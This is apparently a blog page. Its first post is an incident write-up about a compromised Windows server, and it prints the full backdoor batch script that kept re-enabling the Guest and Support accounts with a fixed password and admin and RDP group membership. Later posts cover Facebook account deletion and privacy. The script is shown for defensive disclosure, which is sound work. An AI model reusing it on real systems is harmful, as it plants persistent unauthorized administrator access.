Malicious Backdoor Batch Script Re-Enables Privileged Guest and Support Accounts on Windows Servers
I recently came across a Windows 2000 server that was found to have been compromised. During the investigation, both the Guest and Support_388945a0 accounts were found to had been placed in the Administrators and Remote Desktop Users groups (as the server was internet facing). Things got interesting however, when we removed these accounts from those groups and disabled them both. After logging back in a short while later, both Guest and Support accounts had been re-enabled and put back into the Admins and RDP groups.
When going to check the Windows hosts file to make sure there weren’t any modifications made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\
1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe
After some analysis, none of these files were found to be inherently malicious, but are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password, and add them to the Admins and RDP group. The 1.exe file, for example, is just a executable with account-management capabilities.
In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:
@cd %systemroot%\system32\drivers\etc\
@1 localgroup “Remote Desktop Users” SUPPORT_388945a0 /add
@1 localgroup “Remote Desktop Users” guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes
At this point it’s fairly evident what’s going on, this bat script is being run periodically, and runs 1.exe to ensure that both the Guest and Support_338945a0 accounts are present, and in the Administrators and Remote Desktop Users groups. It also sets the password to both of those accounts to ‘QQqqaa123321’. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.
These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.
How To Delete Your Account on 14 Popular Websites
A few months ago I posted about Facebook’s ever-so-slightly simplified account deletion process. I just stumbled across an article on Smashing Magazine that describes how to delete one’s account on 14 popular websites.
Here are the relevant links for the following sites:
Facebook (Delete Account page)
MySpace (people still use this?)
Windows Live (“Close your account” at the bottom)
Facebook (finally) adds ability to delete accounts
Facebook has finally added the ability to actually delete – not just deactivate – Mark Zuckerberg one’s account. Until now, the only (easy) option has been to ‘deactivate’ your account which simply removes you from searches and prevents you from logging in (although you can very quickly re-activate). I say ‘easy’, as there did exist a very convoluted delete process. That said, however, they still don’t seem to have made the delete option available to everyone – or they’ve made it particularly hard to find – as I still seem to be stuck with ‘deactivate’.
Even if you can’t find the option in your Facebook settings, you can delete your account by visiting this page (confirmation required) which states:
If you do not think you will use Facebook again and would like your account deleted, we can take care of this for you. Keep in mind that you will not be able to reactivate your account or retrieve any of the content or information you have added. If you would like your account deleted, then click “Submit.”
After submitting an account deletion request you will receive an email informing you that your account will be deleted in 14 days (unless you log back in). Note that if you have your Twitter or YouTube accounts linked to Facebook, then an update from either of these within the 14-day period will also abort the deletion process.
This is in contrast to just deactivating which, as described on Facebook’s deactivation page:
Even after you deactivate, your friends can still invite you to events, tag you in photos, or ask you to join groups.
… so much for ‘deactivation’.
It should probably be noted that although deleting your account will probably automatically remove any content you’ve posted on Facebook, they still reserve the right to retain your information, and you can also be certain that everything you’ve ever posted or done on the site will remain in the slews of hourly backups that are performed and undoubtedly retained for a couple years. There’s no way they are going to go to the effort of clearing their backups of deleted accounts (also, that information is worth far too much them to delete).
The following extract from Facebook’s Privacy Policy outlines the limitations of such account removals:
Even after you remove information from your profile or delete your account, copies of that information may remain viewable elsewhere to the extent it has been shared with others, it was otherwise distributed pursuant to your privacy settings, or it was copied or stored by other users. However, your name will no longer be associated with that information on Facebook. (For example, if you post something to another user’s profile and then you delete your account, that post may remain, but be attributed to an “Anonymous Facebook User.”) Additionally, we may retain certain information to prevent identity theft and other misconduct even if deletion has been requested. If you have given third party applications or websites access to your information, they may retain your information to the extent permitted under their terms of service or privacy policies. But they will no longer be able to access the information through our Platform after you disconnect from them.
Despite my strong views towards privacy, I’m not a complete Facebook hater; it does have its uses and I do have a (very spartan) account there. I just want to help highlight the potential risks and issues associated with the rapid increase in recent online information disclosure and unfortunately the only way to win this particular privacy game… is to avoid playing in the first place.
Loading ...
